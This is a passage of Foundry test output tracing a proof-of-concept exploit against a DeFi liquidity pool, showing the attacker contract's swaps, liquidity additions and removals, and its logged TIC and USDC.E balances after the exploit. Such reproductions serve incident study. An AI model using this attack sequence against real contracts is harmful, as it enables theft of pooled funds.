    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 115792089237316195423570985008687907853269984665640564039457584007716244508228 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xbdca07427dcbcd41ed17185640310d25cee65b76ce8762ee963ddefde83ca885: 0x0000000000000000000000000000000000000000000000000000005bae8961e9 → 0x0000000000000000000000000000000000000000000000000000005bae8962b1
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000000000084aab8004b → 0x00000000000000000000000000000000000000000000000000000084aab7ff83
    │   │   │   │   │   │   │   @ 0x8b4ad34eb2fadf284b0c0dcf5d591db815aecc058e8823c9b0aa58d0781dc474: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd228bb4f0c → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd228bb4e44
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3170] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 41119385246855392553752 [4.111e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 41119385246855392553752 [4.111e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x47d27ecede5de52201c8f0683ee67d93adbf6ce81ebcbadc98d2da193d52caea: 0x0000000000000000000000000000000000000000000008cb7d3d6dfee90d5b73 → 0x0000000000000000000000000000000000000000000000166722ffd2236ef05b
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000ad2c97d8cebe8cecc25 → 0x000000000000000000000000000000000000000000001387df97fb18ae6d373d
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit Swap(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0, param2: 200, param3: 41119385246855392553752 [4.111e22], param4: 0)
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 92231385246749413947197 [9.223e22]
    │   │   │   │   ├─ [886] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 569799868291 [5.697e11]
    │   │   │   │   ├─ [74487] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::addLiquidity(92231385246749413947197 [9.223e22], 569799868291 [5.697e11], 0, 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000 [1e12])
    │   │   │   │   │   ├─ [327] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 4412803431946595 [4.412e15]
    │   │   │   │   │   ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 413260153234727563355 [4.132e20]
    │   │   │   │   │   ├─ [25858] 0xE3C08c95aa81474f44Bee23f8C45d470ddaD37Be::faf5c6ed(000000000000000000000000000000000000000000001387df97fb18ae6d373d00000000000000000000000000000000000000000000000000000084aab7ff83000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000166722ffd2236ef05b000000000000000000000000000000000000000000000000000fad6bdd0659630000000000000000000000000000000000000000000000000000000000000006) [delegatecall]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 6: 0x0000000000000000000000000000000000000000000000166722ffd2236ef05b → 0x00000000000000000000000000000000000000000000139e46bafaead1dc2798
    │   │   │   │   │   │   │   @ 7: 202 → 45284
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000001387df97fb18ae6d373d000000000000000000000000000000000000000000000000000000000000b01a0000000000000000000000000000000000000000000000000daf3225c124db06000000000000000000000000000000000000000000000000000004f9281c630e
    │   │   │   │   │   ├─ [341] 0x8B3D780Db8842593d8b61632A2F76c4D4f31D7C3::feeAddress() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000008aa16c21a8b529a655711c62bdef27456b1e8fe3
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x8AA16c21a8b529a655711c62BdEf27456b1E8Fe3, value: 5468166316814 [5.468e12])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 986061981153024774 [9.86e17])
    │   │   │   │   │   ├─ [3582] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 92231385246749413947197 [9.223e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 92231385246749413947197 [9.223e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x47d27ecede5de52201c8f0683ee67d93adbf6ce81ebcbadc98d2da193d52caea: 0x0000000000000000000000000000000000000000000000166722ffd2236ef05b → 0x00000000000000000000000000000000000000000000139e46bafaead1dc2798
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000001387df97fb18ae6d373d → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [7337] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, 45082 [4.508e4])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 45082 [4.508e4])
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, value: 115792089237316195423570985008687907853269984665640564039457584007716244463146 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x8b4ad34eb2fadf284b0c0dcf5d591db815aecc058e8823c9b0aa58d0781dc474: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd228bb4e44 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd228ba9e2a
    │   │   │   │   │   │   │   @ 0xbdca07427dcbcd41ed17185640310d25cee65b76ce8762ee963ddefde83ca885: 0x0000000000000000000000000000000000000000000000000000005bae8962b1 → 0x0000000000000000000000000000000000000000000000000000005bae8a12cb
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000000000084aab7ff83 → 0x00000000000000000000000000000000000000000000000000000084aab74f69
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit AddLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 92231385246749413947197 [9.223e22], param2: 45082 [4.508e4])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000001196fa7adbfdd21ab6e6 → 0x00000000000000000000000000000000000000000d8e49978b08e96a434bc360
    │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000000000fad6bdd065963 → 0x0000000000000000000000000000000000000000000000000dbee48ac6479777
    │   │   │   │   │   │   @ 0x7b55e6202e2a418dbde9e7e2a8077e8eb7f40f5a03a0b897992123f7edb7c787: 0x000000000000000000000000000000000000000000000000000001d4b2c44d38 → 0x000000000000000000000000000000000000000000000000000006cddae0b046
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000daf3225c124db06
    │   │   │   │   │   │   @ 7: 202 → 45284
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [599] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 986061981153024774 [9.86e17]
    │   │   │   │   ├─ [70261] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::removeLiquidity(986061981153024774 [9.86e17], 1, 1, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000 [1e12])
    │   │   │   │   │   ├─ [327] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 990480252751288183 [9.904e17]
    │   │   │   │   │   ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 92644645399984141510552 [9.264e22]
    │   │   │   │   │   ├─ [886] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::balanceOf(0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 393770308299 [3.937e11]
    │   │   │   │   │   ├─ [327] 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 990480252751288183 [9.904e17]
    │   │   │   │   │   ├─ [25749] 0xE3C08c95aa81474f44Bee23f8C45d470ddaD37Be::6cb4024b(0000000000000000000000000000000000000000000000000dbee48ac647977700000000000000000000000000000000000000000000139e46bafaead1dc2798000000000000000000000000000000000000000000000000000000000000b0e400000000000000000000000000000000000000000d8e49978b08e96a434bc360) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 986061981153024774 [9.86e17])
    │   │   │   │   │   ├─ [23070] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 92231382031668692420301 [9.223e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 92231382031668692420301 [9.223e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x47d27ecede5de52201c8f0683ee67d93adbf6ce81ebcbadc98d2da193d52caea: 0x00000000000000000000000000000000000000000000139e46bafaead1dc2798 → 0x000000000000000000000000000000000000000000000016672e6beb73c3a0cb
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000001387df8c8eff5e1886cd
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [4147] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 392013802639 [3.92e11])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4ae1Da57f2d6b2E9a23d07e264Aa2B3bBCaeD19A, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 392013802639 [3.92e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000000000084aab74f69 → 0x000000000000000000000000000000000000000000000000000000dff08f3bf8
    │   │   │   │   │   │   │   @ 0xbdca07427dcbcd41ed17185640310d25cee65b76ce8762ee963ddefde83ca885: 0x0000000000000000000000000000000000000000000000000000005bae8a12cb → 0x0000000000000000000000000000000000000000000000000000000068b2263c
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit RemoveLiquidity(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 92231382031668692420301 [9.223e22], param2: 392013802639 [3.92e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 7: 45284 → 0
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000000daf3225c124db06 → 0
    │   │   │   │   │   │   @ 6: 0x00000000000000000000000000000000000000000000139e46bafaead1dc2798 → 0x000000000000000000000000000000000000000000000016672e6beb73c3a0cb
    │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000000000000dbee48ac6479777 → 0x000000000000000000000000000000000000000000000000000fb2650522bc71
    │   │   │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000d8e49978b08e96a434bc360 → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [4147] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::transfer(0xA389f9430876455C36478DeEa9769B7Ca4E3DDB1, 774353000000 [7.743e11])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xA389f9430876455C36478DeEa9769B7Ca4E3DDB1, value: 774353000000 [7.743e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x4d1a5c3e94682e32651f2d47f09364b017346de5c260f4ba39fc946f6cb1cd91: 0x000000000000000000000000000000000000000000000000000001055353e530 → 0x000000000000000000000000000000000000000000000000000001b99e5cfb70
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000000000000dff08f3bf8 → 0x0000000000000000000000000000000000000000000000000000002ba58625b8
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 5: 2 → 1
    │   │   │   │   │   @ 0xbdca07427dcbcd41ed17185640310d25cee65b76ce8762ee963ddefde83ca885: 0x0000000000000000000000000000000000000000000000000000005bae8961e7 → 0x000000000000000000000000000000000000000000000000000000b75d12c3ce
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [886] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::balanceOf(0xA389f9430876455C36478DeEa9769B7Ca4E3DDB1) [staticcall]
    │   │   │   │   └─ ← [Return] 1896737471344 [1.896e12]
    │   │   │   ├─ [2491] 0xB31f66AA3C1e785363F0875A1B74E27b85FD66c7::balanceOf(0xA389f9430876455C36478DeEa9769B7Ca4E3DDB1) [staticcall]
    │   │   │   │   └─ ← [Return] 145963383031799656358475 [1.459e23]
    │   │   │   ├─ emit Sync(reserve0: 1896737471344 [1.896e12], reserve1: 145963383031799656358475 [1.459e23])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 774353000000 [7.743e11], amount1In: 0, amount0Out: 766685000000 [7.666e11], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x6397e1ae000000001ee8b0db804639fe224b000000000000000001b7d5509670 → 0x6397e208000000001ee8b0db804639fe224b000000000000000001b99e5cfb70
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000008c0bb50384728dfc789dc83656 → 0x000000000000000000000000000000000000008c0bba0436d806f9593b393aa2
    │   │   │   │   @ 9: 0x0000000000000000000012214ff6445562b1524e0433a47235f2ece433b0a224 → 0x000000000000000000001221564962ac68f47737cd572f7d548c51765559549a
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3170] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::transfer(0x4CF9dC05c715812FeAD782DC98de0168029e05C8, 51624000000000000000000 [5.162e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4CF9dC05c715812FeAD782DC98de0168029e05C8, value: 51624000000000000000000 [5.162e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000001387df8c8eff5e1886cd → 0x00000000000000000000000000000000000000000000089954a19aac007886cd
    │   │   │   │   @ 0x7577a4ef65a4afd59ac11d8d86b4b0e83aa7148d1f036c8c960cf4c05a4d74ec: 0x0000000000000000000000000000000000000000000000000589b8bff45d533a → 0x000000000000000000000000000000000000000000000aee9074ad1351fd533a
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 12: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(0x4CF9dC05c715812FeAD782DC98de0168029e05C8) [staticcall]
    │   │   └─ ← [Return] 51624399053176577020730 [5.162e22]
    │   ├─ [2886] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::balanceOf(0x4CF9dC05c715812FeAD782DC98de0168029e05C8) [staticcall]
    │   │   └─ ← [Return] 242733525540 [2.427e11]
    │   ├─ emit Sync(reserve0: 51624399053176577020730 [5.162e22], reserve1: 242733525540 [2.427e11])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 51624000000000000000000 [5.162e22], amount1In: 0, amount0Out: 51112000000000000000000 [5.111e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x6397d44c00000000000000000038840baa24000000000ad2cf0745c489fd533a → 0x6397e20800000000000000000038840baa24000000000aee9074ad1351fd533a
    │   │   @ 10: 0x000000000000000000003b8df8c6a14c7e3fa5c3a45fab8034c5aa8b43c62ec4 → 0x000000000000000000003b909a22162d42404dbe66e3b202a903b14cb377e720
    │   │   @ 9: 0x000000000000000000000000000000000000000929974f078d5e15207e40531b → 0x000000000000000000000000000000000000000929df0629d902f329f376a647
    │   └─ ← [Stop]
    ├─ [886] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 187460625848 [1.874e11]
    ├─ [366] 0xA7D7079b0FEaD91F3e65f86E8915Cb59c1a4C664::decimals() [staticcall]
    │   └─ ← [Return] 6
    ├─ emit log_named_decimal_uint(key: "Attacker USDC.E balance after exploit", val: 187460625848 [1.874e11], decimals: 6)
    ├─ [581] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 40607382031668692420301 [4.06e22]
    ├─ [222] 0x75739a693459f33B1FBcC02099eea3eBCF150cBe::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker TIC balance after exploit", val: 40607382031668692420301 [4.06e22], decimals: 18)
    ├─  storage changes:
    │   @ 0x8b4ad34eb2fadf284b0c0dcf5d591db815aecc058e8823c9b0aa58d0781dc474: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 12.23s (10.72s CPU time)

Ran 2 test suites in 13.38s (12.76s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
